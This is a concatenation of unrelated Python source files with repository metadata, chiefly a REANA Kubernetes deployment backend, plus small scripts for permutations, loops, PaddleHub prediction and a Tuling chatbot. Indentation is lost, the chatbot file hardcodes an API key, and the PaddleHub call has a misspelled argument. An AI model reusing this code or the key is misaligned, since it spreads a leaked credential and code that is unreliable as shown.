"""Initialise Kubernetes specific ReanaBackend-object.
:param cluster_spec: Dictionary representing complete REANA
cluster spec file.
:param cluster_conf: A generator/iterable of Kubernetes YAML manifests
of REANA components as Python objects. If set to `None`
cluster_conf will be generated from manifest templates in
`templates` folder specified in `_conf.templates_folder`
:param kubeconfig: Name of the kube-config file to use for configuring
reana-cluster. If set to `None` then `$HOME/.kube/config` will be
used.
Note: Might pickup a config-file defined in $KUBECONFIG as well.
:param kubeconfig_context: set the active context. If is set to `None`,
current_context from config file will be used.
:param cephfs: Boolean flag toggling the usage of a cephfs volume as
storage backend.
:param cephfs_volume_size: Int number which represents cephfs volume
size (GB)
:param cvmfs: Boolean flag toggling the mounting of cvmfs volumes in
the cluster pods.
:param debug: Boolean flag setting debug mode.
:param url: REANA cluster url.
"""
logging.debug('Creating a ReanaBackend object '
'for Kubernetes interaction.')
# Load Kubernetes cluster configuration. If reana-cluster.yaml
# doesn't specify this K8S Python API defaults to '$HOME/.kube/config'
self.kubeconfig = kubeconfig or \
cluster_spec['cluster'].get('config', None)
self.kubeconfig_context = kubeconfig_context or \
cluster_spec['cluster'].get('config_context', None)
k8s_api_client_config = Configuration()
k8s_config.load_kube_config(kubeconfig, self.kubeconfig_context,
k8s_api_client_config)
Configuration.set_default(k8s_api_client_config)
# Instantiate clients for various Kubernetes REST APIs
self._corev1api = k8s_client.CoreV1Api()
self._versionapi = k8s_client.VersionApi()
self._extbetav1api = k8s_client.ExtensionsV1beta1Api()
self._rbacauthorizationv1api = k8s_client.RbacAuthorizationV1Api()
self._storagev1api = k8s_client.StorageV1Api()
self.k8s_api_client_config = k8s_api_client_config
self.cluster_spec = cluster_spec
self.cluster_conf = cluster_conf or \
self.generate_configuration(cluster_spec,
cephfs=cephfs,
cephfs_volume_size=cephfs_volume_size,
debug=debug,
url=url)
@property
def cluster_type(self):
"""."""
return self.__cluster_type
@property
def cluster_url(self):
"""Return URL of Kubernetes instance `reana-cluster` connects to."""
return self.k8s_api_client_config.host
@property
def current_config(self):
"""Return Kubernetes configuration (e.g. `~/.kube/config`)."""
return self.k8s_api_client_config
@property
def current_kubeconfig_context(self):
"""Return K8S kubeconfig context used to initialize K8S Client(s)."""
return self.kubeconfig_context
@property
def current_kubeconfig(self):
"""Return K8S kubeconfig used to initialize K8S Client(s).
(e.g. `~/.kube/config`)
"""
return self.kubeconfig
@classmethod
def generate_configuration(cls, cluster_spec, cvmfs=False, cephfs=False,
cephfs_volume_size=None, debug=False, url=None):
"""Generate Kubernetes manifest files used to init REANA cluster.
:param cluster_spec: Dictionary representing complete REANA
cluster spec file.
:param cephfs: Boolean which represents whether REANA is
deployed with CEPH or not.
:param cephfs_volume_size: Int to set CEPH volume size in GB.
:param cvmfs: Boolean which represents whether REANA is
deployed with CVMFS or not.
:param debug: Boolean which represents whether REANA is
deployed in debug mode or not.
:param url: REANA cluster url.
:return: A generator/iterable of generated Kubernetes YAML manifests
as Python objects.
"""
# Setup an Environment for Jinja
env = Environment(
loader=FileSystemLoader(
cls._conf['templates_folder']),
keep_trailing_newline=False
)
# Define where are backend conf params needed when rendering templates.
be_conf_params_fp = cls._conf['templates_folder'] + '/config.yaml'
try:
with open(be_conf_params_fp) as f:
# Load backend conf params
backend_conf_parameters = yaml.load(f.read(),
Loader=yaml.FullLoader)
# change type of deployment (cephfs|cvmfs|hostpath)
if cephfs or cluster_spec['cluster'].get('cephfs'):
backend_conf_parameters['CEPHFS'] = True
if not cephfs_volume_size:
cephfs_volume_size = \
cluster_spec['cluster'].get(
'cephfs_volume_size',
200)
if debug or cluster_spec['cluster'].get('debug'):
backend_conf_parameters['DEBUG'] = True
if url or cluster_spec['cluster'].get('url'):
backend_conf_parameters['URL'] = True
if cluster_spec['cluster'].get('cephfs_monitors'):
backend_conf_parameters['CEPHFS_MONITORS'] = \
cluster_spec['cluster'].get('cephfs_monitors')
if cluster_spec['cluster'].get('root_path'):
backend_conf_parameters['ROOT_PATH'] = \
cluster_spec['cluster'].get('root_path')
if cluster_spec['cluster'].get('shared_volume_path'):
backend_conf_parameters['SHARED_VOLUME_PATH'] = \
cluster_spec['cluster'].get('shared_volume_path')
if cluster_spec['cluster'].get('db_persistence_path'):
backend_conf_parameters['DB_PERSISTENCE_PATH'] = \
cluster_spec['cluster'].get('db_persistence_path')
# Would it be better to combine templates or populated
# templates in Python code for improved extensibility?
# Just drop a .yaml template and add necessary to config.yaml
# without changing anything?
# Load template combining all other templates from
# templates folder
template = env.get_template('backend_conf.yaml')
components = cluster_spec['components']
rs_img = components['reana-server']['image']
rwfc_img = components['reana-workflow-controller']['image']
rmb_img = components['reana-message-broker']['image']
rs_environment = components['reana-server']\
.get('environment', [])
rwfc_environment = components['reana-workflow-controller'] \
.get('environment', [])
rmb_environment = components['reana-message-broker'] \
.get('environment', [])
rs_environment = components['reana-server']\
.get('environment', [])
rwfc_environment = components['reana-workflow-controller'] \
.get('environment', [])
rmb_environment = components['reana-message-broker'] \
.get('environment', [])
rs_mountpoints = components['reana-server']\
.get('mountpoints', [])
rwfc_mountpoints = components['reana-workflow-controller']\
.get('mountpoints', [])
rmb_mountpoints = components['reana-message-broker'] \
.get('mountpoints', [])
# Render the template using given backend config parameters
cluster_conf = template.\
render(backend_conf_parameters,
REANA_URL=cluster_spec['cluster'].get(
'reana_url',
url),
CEPHFS_VOLUME_SIZE=cephfs_volume_size or 1,
SERVER_IMAGE=rs_img,
WORKFLOW_CONTROLLER_IMAGE=rwfc_img,
MESSAGE_BROKER_IMAGE=rmb_img,
RS_MOUNTPOINTS=rs_mountpoints,
RWFC_MOUNTPOINTS=rwfc_mountpoints,
RMB_MOUNTPOINTS=rmb_mountpoints,
RS_ENVIRONMENT=rs_environment,
RWFC_ENVIRONMENT=rwfc_environment,
RMB_ENVIRONMENT=rmb_environment,
)
# Strip empty lines for improved readability
cluster_conf = '\n'.join(
[line for line in cluster_conf.splitlines() if
line.strip()])
# Should print the whole configuration in a loop
# Now prints just memory address of generator object
logging.debug('Loaded K8S config successfully: \n {}'
.format(yaml.load_all(cluster_conf,
Loader=yaml.FullLoader)))
except TemplateNotFound as e:
logging.info(
'Something wrong when fetching K8S config file templates from '
'{filepath} : \n'
'{error}'.format(
filepath=cls._conf['templates_folder'],
error=e.strerror))
raise e
except TemplateSyntaxError as e:
logging.info(
'Something went wrong when parsing K8S template from '
'{filepath} : \n'
'{error}'.format(
filepath=e.filename,
error=e.strerror))
raise e
except IOError as e:
logging.info(
'Something wrong when reading K8S config parameters-file from '
'{filepath} : \n'
'{error}'.format(filepath=be_conf_params_fp,
error=e.strerror))
raise e
# As Jinja rendered string is basically multiple YAML documents in one
# string parse it with YAML-library and return a generator containing
# independent YAML documents (split from `---`) as Python objects.
return yaml.load_all(cluster_conf, Loader=yaml.FullLoader)
def init(self, traefik):
"""Initialize REANA cluster, i.e. deploy REANA components to backend.
:param traefik: Boolean flag determines if traefik should be
initialized.
:return: `True` if init was completed successfully.
:rtype: bool
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
if not self._cluster_running():
pass
# Should check that cluster is not already initialized.
# Maybe use `verify_components()` or `get()` each component?
if traefik is True:
self.initialize_traefik()
for manifest in self.cluster_conf:
try:
logging.debug(json.dumps(manifest))
if manifest['kind'] == 'Deployment':
# REANA Job Controller needs access to K8S-cluster's
# service-account-token in order to create new Pods.
components_k8s_token = \
['reana-server', 'workflow-controller']
if manifest['metadata']['name'] in components_k8s_token:
manifest = self._add_service_acc_key_to_component(
manifest)
self._extbetav1api.create_namespaced_deployment(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Namespace':
self._corev1api.create_namespace(body=manifest)
elif manifest['kind'] == 'ResourceQuota':
self._corev1api.create_namespaced_resource_quota(
body=manifest,
namespace=manifest['metadata']['namespace'])
elif manifest['kind'] == 'Service':
self._corev1api.create_namespaced_service(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'ClusterRole':
self._rbacauthorizationv1api.create_cluster_role(
body=manifest)
elif manifest['kind'] == 'ClusterRoleBinding':
self._rbacauthorizationv1api.\
create_cluster_role_binding(body=manifest)
elif manifest['kind'] == 'Ingress':
self._extbetav1api.create_namespaced_ingress(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'StorageClass':
self._storagev1api.create_storage_class(body=manifest)
elif manifest['kind'] == 'PersistentVolumeClaim':
self._corev1api.create_namespaced_persistent_volume_claim(
body=manifest,
namespace=manifest['metadata'].get('namespace',
'default'))
except ApiException as e: # Handle K8S API errors
if e.status == 409:
logging.info(
'{0} {1} already exists, continuing ...'.format(
manifest['kind'],
manifest['metadata'].get('name')))
continue
if e.status == 400:
pass
raise e
return True
def initialize_traefik(self):
"""Install and initialize traefik via Helm.
Traefik dashboard service is not accessible by default, to make it
accessible inside Minikube service type is changed to NodePort.
"""
from reana_cluster.config import (traefik_configuration_file_path,
traefik_release_name)
try:
namespace = 'kube-system'
label_selector = 'app=traefik'
cmd = ('helm install stable/traefik --namespace {} --values {} '
'--name {}').format(namespace,
traefik_configuration_file_path,
traefik_release_name)
cmd = shlex.split(cmd)
subprocess.check_output(cmd)
traefik_objects = self._corev1api.list_namespaced_service(
namespace=namespace,
label_selector=label_selector,
limit=2)
traefik_dashboard_body = None
for traefik_object in traefik_objects.items:
if 'dashboard' in traefik_object.metadata.name:
traefik_dashboard_body = traefik_object
break
traefik_dashboard_body.spec.type = 'NodePort'
self._corev1api.patch_namespaced_service(
name=traefik_dashboard_body.metadata.name,
namespace=namespace,
body=traefik_dashboard_body
)
except Exception as e:
logging.error('Traefik initialization failed \n {}.'.format(e))
raise e
def _add_service_acc_key_to_component(self, component_manifest):
"""Add K8S service account credentials to a component.
In order to interact (e.g. create Pods to run workflows) with
Kubernetes cluster REANA Job Controller needs to have access to
API credentials of Kubernetes service account.
:param component_manifest: Python object representing Kubernetes
Deployment manifest file of a REANA component generated with
`generate_configuration()`.
:return: Python object representing Kubernetes Deployment-
manifest file of the given component with service account
credentials of the Kubernetes instance `reana-cluster`
if configured to interact with.
"""
# Get all secrets for default namespace
# Cannot use `k8s_corev1.read_namespaced_secret()` since
# exact name of the token (e.g. 'default-token-8p260') is not know.
secrets = self._corev1api.list_namespaced_secret(
'default', include_uninitialized='false')
# Maybe debug print all secrets should not be enabled?
# logging.debug(k8s_corev1.list_secret_for_all_namespaces())
# K8S might return many secrets. Find `service-account-token`.
for item in secrets.items:
if item.type == 'kubernetes.io/service-account-token':
srv_acc_token = item.metadata.name
# Search for appropriate place to place the token
# in job-controller deployment manifest
for i in (component_manifest['spec']['template']['spec']
['volumes']):
if i['name'] == 'svaccount':
i['secret']['secretName'] = srv_acc_token
return component_manifest
def _cluster_running(self):
"""Verify that interaction with cluster backend is possible.
THIS IS CURRENTLY JUST A MOCKUP. NO REAL CHECKS ARE DONE.
Verifies that Kubernetes deployment is reachable through it's REST API.
Only very basic checking is done and it is not guaranteed that REANA
cluster can be initialized, just that interaction with the specified
Kubernetes deployment is possible.
:return: `True` if Kubernetes deployment is reachable through
it's REST API.
"""
# Maybe just do a request to `/healthz/ping` -endpoint at cluster_url?
# i.e no kubernetes-python client interaction?
return True
def restart(self):
"""Restarts all deployed components. NOT CURRENTLY IMPLEMENTED.
:raises NotImplementedError:
"""
raise NotImplementedError()
def down(self):
"""Bring REANA cluster down, i.e. deletes all deployed components.
Deletes all Kubernetes Deployments, Namespaces, Resourcequotas and
Services that were created during initialization of REANA cluster.
:return: `True` if all components were destroyed successfully.
:rtype: bool
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
# What is a good propagationPolicy of `V1DeleteOptions`?
# Default is `Orphan`
# https://kubernetes.io/docs/concepts/workloads/controllers/garbage-collection/
# https://github.com/kubernetes-incubator/client-python/blob/master/examples/notebooks/create_deployment.ipynb
if not self._cluster_running():
pass
# All K8S objects seem to use default -namespace.
# Is this true always, or do we create something for non-default
# namespace (in the future)?
for manifest in self.cluster_conf:
try:
logging.debug(json.dumps(manifest))
if manifest['kind'] == 'Deployment':
self._extbetav1api.delete_namespaced_deployment(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(
propagation_policy="Foreground",
grace_period_seconds=5),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Namespace':
self._corev1api.delete_namespace(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'ResourceQuota':
self._corev1api.delete_namespaced_resource_quota(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'Service':
self._corev1api.delete_namespaced_service(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'ClusterRole':
self._rbacauthorizationv1api.delete_cluster_role(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'ClusterRoleBinding':
self._rbacauthorizationv1api.\
delete_cluster_role_binding(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'Ingress':
self._extbetav1api.delete_namespaced_ingress(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
elif manifest['kind'] == 'StorageClass':
self._storagev1api.delete_storage_class(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions())
elif manifest['kind'] == 'PersistentVolumeClaim':
self._corev1api.\
delete_namespaced_persistent_volume_claim(
name=manifest['metadata']['name'],
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
except ApiException as e: # Handle K8S API errors
if e.status == 409: # Conflict, object probably already exists
pass
if e.status == 404:
pass
if e.status == 400:
pass
# delete all CVMFS persistent volume claims
pvcs = self._corev1api.list_namespaced_persistent_volume_claim(
'default')
for pvc in pvcs.items:
if pvc.metadata.name.startswith('csi-cvmfs-'):
self._corev1api.\
delete_namespaced_persistent_volume_claim(
name=pvc.metadata.name,
body=k8s_client.V1DeleteOptions(),
namespace=manifest['metadata'].get('namespace',
'default'))
# delete all CVMFS storage classes
scs = self._storagev1api.list_storage_class()
for sc in scs.items:
if sc.metadata.name.startswith('csi-cvmfs-'):
self._storagev1api.delete_storage_class(
name=sc.metadata.name,
body=k8s_client.V1DeleteOptions())
# delete traefik objects
from reana_cluster.config import traefik_release_name
cmd = 'helm del --purge {}'.format(traefik_release_name)
cmd = shlex.split(cmd)
subprocess.check_output(cmd)
return True
def get_component(self, component_name, component_namespace='default'):
"""Fetch info (e.g.URL) about deployed REANA component.
Fetches information such as URL(s) of a REANA component deployed to
REANA cluster.
:param component_name: Name of the REANA component whose information
is to be fetched.
:type component_name: string
:param component_namespace: Namespace where REANA component specified
with `component_name` is deployed. Kubernetes specific information.
:type component_namespace: string
:return: Information (e.g. URL(s)) about a deployed REANA component.
:rtype: dict
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
comp_info = {
'internal_ip': '',
'ports': [],
'external_ip_s': [],
'external_name': '',
}
try:
# Strip reana-prefix from component name if it is there.
component_name_without_prefix = None
if not component_name.startswith('reana-'):
component_name_without_prefix = component_name
else:
component_name_without_prefix = component_name[len('reana-'):]
minikube_ip = None
# If running on Minikube, ip-address is Minikube VM-address
nodeconf = self._corev1api.list_node()
# There can be many Nodes. Is this a problem?
# (i.e. How to know which is the one should be connected to?)
for item in nodeconf.items:
if item.metadata.name == 'minikube' or \
item.metadata.name == self.kubeconfig_context:
# Running on minikube --> get ip-addr
minikube_ip = subprocess.check_output(['minikube', 'ip'])
minikube_ip = minikube_ip.decode("utf-8")
minikube_ip = minikube_ip.replace('\n', '')
# Get ip-addresses and ports of the component (K8S service)
comp = self._corev1api.read_namespaced_service(
component_name_without_prefix,
component_namespace)
logging.debug(comp)
comp_info['external_name'] = comp.spec.external_name
comp_info['external_ip_s'] = [minikube_ip] or \
comp.spec.external_i_ps
comp_info['internal_ip'] = comp.spec.external_i_ps
if component_name_without_prefix == 'server':
traefik_ports = self.get_traefik_ports()
else:
traefik_ports = None
if traefik_ports:
comp_info['ports'].extend(traefik_ports)
else:
for port in comp.spec.ports:
if minikube_ip:
comp_info['ports'].append(str(port.node_port))
else:
comp_info['ports'].append(str(port.port))
logging.debug(comp_info)
except ApiException as e: # Handle K8S API errors
if e.status == 409: # Conflict
pass
if e.status == 404:
pass
if e.status == 400:
pass
raise e
return comp_info
def get_traefik_ports(self):
"""Return the list of Traefik ports if Traefik is present."""
namespace = 'kube-system'
label_selector = 'app=traefik'
try:
traefik_objects = self._corev1api.list_namespaced_service(
namespace=namespace,
label_selector=label_selector,
limit=2)
ports = []
for object in traefik_objects.items:
for port in object.spec.ports:
if port.name == 'http':
ports.append(port.node_port)
elif port.name == 'https':
ports.append(port.node_port)
return ports
except ApiException as e:
if e.reason == "Not Found":
logging.error("K8s traefik objects were not found.")
else:
logging.error('Exception when calling '
'CoreV1Api->list_namespaced_service:\n {e}'
.format(e))
return None
except Exception as e:
logging.error('Something went wrong. Traefik port '
'was not found:\n {e}'.format(e))
return None
def verify_components(self):
"""Verify that REANA components are setup according to specifications.
Verifies that REANA components are set up as specified in REANA
cluster specifications file.
Components must be deployed first, before verification can be done.
Currently verifies only that docker image (<NAME>:<TAG> -string) of a
deployed component matches to docker image specified in REANA cluster
specification file.
:return: Dictionary with component names for keys and booleans
for values stating if verification was successful.
:rtype: dict
:raises ApiException: Failed to successfully interact with
Kubernetes REST API. Reason for failure is indicated as HTTP error
codes in addition to a textual description of the error.
"""
if not self._cluster_running():
pass
try:
matching_components = dict()
for manifest in self.cluster_conf:
# We are only interested in Deployment manifests since
# these define docker images that Kubernetes Pods based on
# these Deployments should be using.
if manifest['kind'] == 'Deployment':
component_name = manifest['metadata']['name']
# Kubernetes Deployment manifest could have multiple
# containers per manifest file. Current implementation
# expects only one container per manifest file.
spec_img = manifest['spec'][
'template']['spec']['containers'][0]['image']
deployed_comp = self._extbetav1api. \
read_namespaced_deployment(component_name, 'default')
logging.debug(deployed_comp)
# Kubernetes Deployment could have multiple containers per
# Deployment. Current implementation expects only one
# container per deployment.
# THIS WILL CAUSE PROBLEM if there are two Pods and one
# of them is (even temporarily, e.g. update situation)
# based on "old" image defined in older REANA cluster
# specification file.
deployed_img = deployed_comp.spec.template.spec.containers[
0].image
logging.info('Component name: {}\n'
'Specified image: {}\n'
'Currently deployed image: {}\n'
.format(component_name,
spec_img,
deployed_img))
matching_components[component_name] = True
if not spec_img == deployed_img:
matching_components[component_name] = False
logging.error('Mismatch between specified and '
'deployed image of {}. \n'
'Specified image: {}\n'
'Currently deployed image: {}\n'
.format(component_name,
spec_img,
deployed_img))
except ApiException as e: # Handle K8S API errors
if e.status == 409:
pass
if e.status == 404:
pass
if e.status == 400:
pass
raise e
return matching_components
def verify_backend(self):
"""Verify that cluster backend is compatible with REANA.
Verifies that REANA cluster backend is 1) compatible with REANA and
2) set up as specified in REANA cluster specifications file.
Currently includes just a version check.
:return: `True` if verification of backend was successful.
:rtype: bool
"""
return self._verify_k8s_version()
def _verify_k8s_version(self):
"""Verify version of K8S instance is compatible with REANA cluster.
Verifies that the version of Kubernetes instance `reana-cluster` is
connecting to is compatible with REANA (min, max versions in config)
and that version is compatible with target version in REANA cluster
specifications file.
Version strings are parsed according to PEP440, which seems to support
semantic versioning style what Kubernetes uses.
(PEP440 not fully compliant with semver)
:return: Dictionary containing the current version, if it is compatible
and the maximum compatible version.
:rtype: dict
"""
if not self._cluster_running():
pass
curr_ver = parse_version(self._versionapi.get_code().git_version)
expected_ver = parse_version(
self.cluster_spec['cluster']['version'])
max_ver = parse_version(self._conf['max_version'])
min_ver = parse_version(self._conf['min_version'])
logging.info('Current K8S version: {}\n'
'Specified K8S version: {}\n'
'Max supported K8S version: {}\n'
'Min supported K8S version: {}'
.format(curr_ver, expected_ver, max_ver, min_ver))
k8s_version_compatibility = dict(current_version=curr_ver,
is_compatible=True,
max_version=max_ver)
# Compare current K8S version to max / min
if curr_ver > max_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too new: {cur} \n'
'Newest version REANA supports is: {max}'
.format(cur=curr_ver, max=max_ver))
elif curr_ver < min_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too old: {cur} \n'
'Oldest version REANA supports is: {min}'
.format(cur=curr_ver, min=min_ver))
# Compare specified version to max/min
elif expected_ver > max_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Specified Kubernetes version is too new: {cur} \n'
'Newest version REANA supports is: {max}'
.format(cur=curr_ver, max=max_ver))
elif expected_ver < min_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Specified Kubernetes version is too old: {cur} \n'
'Oldest version REANA supports is: {min}'
.format(cur=curr_ver, min=min_ver))
# Compare specified version to current K8S version
elif expected_ver < curr_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too new: {cur} \n'
'Specification expects: {expected}'
.format(cur=curr_ver, expected=expected_ver))
elif expected_ver > curr_ver:
k8s_version_compatibility['is_compatible'] = False
logging.error('Your Kubernetes version is too old: {cur} \n'
'Specification expects: {expected}'
.format(cur=curr_ver, expected=expected_ver))
return k8s_version_compatibility
def get_components_status(self, component=None):
"""Return status for components in cluster.
Gets all pods in the k8s namespace and matches them with the
equivalent component, writing their status in a dictionary.
:return: Dictionary containing each component and its status
:rtype: dict
"""
def _write_status(pod, component_name, components_status):
"""Determine the component status."""
if pod.status.container_statuses:
if pod.status.container_statuses[0].ready:
components_status[component_name] = 'Running'
elif pod.status.container_statuses[0].\
state.waiting is not None:
components_status[component_name] = \
pod.status.container_statuses[0].\
state.waiting.reason
else:
components_status[component] = 'Unavailable'
if component and component.startswith('reana-'):
component = component.replace('reana-', '')
all_pods = self._corev1api.list_namespaced_pod('default')
components_status = dict()
if component:
for current_pod in all_pods.items:
if current_pod.metadata.name.startswith(component):
_write_status(current_pod, component, components_status)
break
else:
deployment_manifests = [m for m in self.cluster_conf
if m['kind'] == 'Deployment']
for manifest in deployment_manifests:
current_pod = None
for pod in all_pods.items:
if pod.metadata.name.startswith(
manifest['metadata']['name']):
current_pod = pod
break
if current_pod:
_write_status(current_pod, manifest['metadata']['name'],
components_status)
return components_status
def exec_into_component(self, component_name, command):
"""Execute a command inside a component.
:param component_name: Name of the component where the command will be
executed.
:param command: String which represents the command to execute inside
the component.
:return: Returns a string which represents the output of the command.
"""
available_components = [manifest['metadata']['name'] for manifest in
self.cluster_conf
if manifest['kind'] == 'Deployment']
if component_name not in available_components:
raise Exception('{0} does not exist.'.format(component_name))
component_pod_name = subprocess.check_output([
'kubectl', 'get', 'pods',
'-l=app={component_name}'.format(component_name=component_name),
'-o', 'jsonpath="{.items[0].metadata.name}"'
]).decode('UTF-8').replace('"', '')
component_shell = [
'kubectl', 'exec', '-t', component_pod_name, '--']
command_inside_component = []
command_inside_component.extend(component_shell)
command_inside_component.extend(command)
output = subprocess.check_output(command_inside_component)
return output.decode('UTF-8')
| 42.247515
| 118
| 0.557563
|
dc0a7136ea574c4f8738e38e209e8a83cbfa3d62
| 1,023
|
py
|
Python
|
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | 2
|
2015-12-02T06:44:01.000Z
|
2016-05-04T21:40:54.000Z
|
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | null | null | null |
Python/leetcode/PermutationSequence.py
|
darrencheng0817/AlgorithmLearning
|
aec1ddd0c51b619c1bae1e05f940d9ed587aa82f
|
[
"MIT"
] | null | null | null |
'''
Created on 1.12.2016
@author: Darren
''''''
The set [1,2,3,…,n] contains a total of n! unique permutation
By listing and labeling all of the permutations in order,
We get the following sequence (ie, for n = 3):
"123"
"132"
"213"
"231"
"312"
"321"
Given n and k, return the kth permutation sequence.
Note: Given n will be between 1 and 9 inclusive."
'''
# Enter your code here. Read input from STDIN. Print output to STDOUT
def getPermutation(M,N):
M-=1
res=[]
factorial=1
nums=list(range(1,N+1))
for roundCount in range(2,N):
factorial*=roundCount
roundCount=N-1
while roundCount>=0:
index=M//factorial
M%=factorial
res.append(nums[index])
nums.pop(index)
if roundCount>0:
factorial//=roundCount
roundCount-=1
return " ".join(str(_) for _ in res)
inputString=input().strip().split(" ")
M=int(inputString[0])
N=int(inputString[1])
print(getPermutation(M,N))
| 25.575
| 70
| 0.609971
|
ec854d4f82afdf4e3d4618df2093e9f5e72c16b0
| 790
|
py
|
Python
|
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | null | null | null |
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | null | null | null |
05_for_in_python.py
|
nagasudhirpulla/python_wrldc_training
|
c3a3216c0a11e1dac03d4637b4b59b28f1bb83c6
|
[
"MIT"
] | 2
|
2020-09-30T16:32:18.000Z
|
2020-10-23T01:13:51.000Z
|
'''
'for' statement in python and using it with 'range' function
'''
# looping for 10 times
for itr in range(10):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(10)...\n\n')
# looping with each element of an array
for itr in [1,5,8,7,45]:
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with arrays...\n\n')
# looping on numbers from 4 to 8
for itr in range(4,9):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(4,9)...\n\n')
# looping on numbers from 4 to 11 with step interval of 2
for itr in range(4,12,2):
print('executing...')
print('x is {0}'.format(itr))
print('execution complete with range(4,12,2)...\n\n')
print('new changes')
| 23.939394
| 60
| 0.643038
|
9823b7bd6365413f348b2c9191e41c14f498024a
| 297
|
py
|
Python
|
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
demo/image_classification/predict.py
|
brooklet/PaddleHub
|
9e6251481fad9de25cea917d24e519e0cd376f5b
|
[
"Apache-2.0"
] | null | null | null |
import paddle
import paddlehub as hub
if __name__ == '__main__':
model = hub.Module(
name='resnet50_vd_imagenet_ssld',
label_list=["roses", "tulips", "daisy", "sunflowers", "dandelion"],
oad_checkpoint='/PATH/TO/CHECKPOINT')
result = model.predict(['flower.jpg'])
| 29.7
| 75
| 0.656566
|
0da1e9a7fce0d8eb322de0dbcb680c85d9edbaca
| 795
|
py
|
Python
|
update_version.py
|
Manny27nyc/BitcoinArmory
|
1d02a6640d6257ab0c37013e5cd4b99681a5cfc3
|
[
"MIT"
] | 505
|
2016-02-04T15:54:46.000Z
|
2022-03-27T18:43:01.000Z
|
update_version.py
|
jimmysong/BitcoinArmory
|
1c7190176897a2e0f3e4e198ab2f199059bb2402
|
[
"MIT"
] | 528
|
2016-02-06T19:50:12.000Z
|
2022-01-15T10:21:16.000Z
|
update_version.py
|
jimmysong/BitcoinArmory
|
1c7190176897a2e0f3e4e198ab2f199059bb2402
|
[
"MIT"
] | 208
|
2015-01-02T10:31:40.000Z
|
2021-12-14T07:37:36.000Z
|
import os
script_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(script_dir)
if os.path.exists('.git') \
and os.path.exists(os.path.join("armoryengine", "ArmoryUtils.py")):
current_head = os.path.join(".git", "HEAD")
f = open(current_head, "r")
ref = f.read()
f.close()
path_parts = ref[5:-1].split("/")
hash_loc = os.path.join(".git", *path_parts)
f = open(hash_loc, "r")
build = f.read()[:10]
f.close()
build_file = os.path.join("armoryengine", "ArmoryBuild.py")
f = open(build_file, "w")
f.write("BTCARMORY_BUILD = '%s'\n" % build)
f.close()
print "Build number has been updated to %s" % build
else:
print "Please run this script from the root Armory source directory" \
" along with the .git directory"
| 27.413793
| 74
| 0.626415
|
b8b6e5b215080e5dfb7856c1912ca93fa6a3d505
| 454
|
py
|
Python
|
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | 1
|
2018-12-11T09:38:42.000Z
|
2018-12-11T09:38:42.000Z
|
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | null | null | null |
turling.py
|
zh2209645/Sample-Raspberry-Chatbot
|
a5315d4ccd1b3be64b44af545c12664e24c8d25e
|
[
"MIT"
] | 1
|
2018-12-11T09:38:44.000Z
|
2018-12-11T09:38:44.000Z
|
import sys, json, requests
def tuling(words):
Tuling_API_KEY = "ad65aaa7e97e4d28bdb3c34fbabf4259"
body = {
"key": Tuling_API_KEY,
"info": words.encode("utf-8")
}
url = "http://www.tuling123.com/openapi/api"
resp = requests.post(url=url, data=body, verify=True)
if resp:
data = json.loads(resp.text)
print(data["text"])
return data["text"]
else:
return None
| 23.894737
| 58
| 0.57489
|
9b6cc73d2ad3327a58c74c9d0f7c427c145b4293
| 5,797
|
py
|
Python
|
python/GafferUI/UserPlugValueWidget.py
|
dboogert/gaffer
|
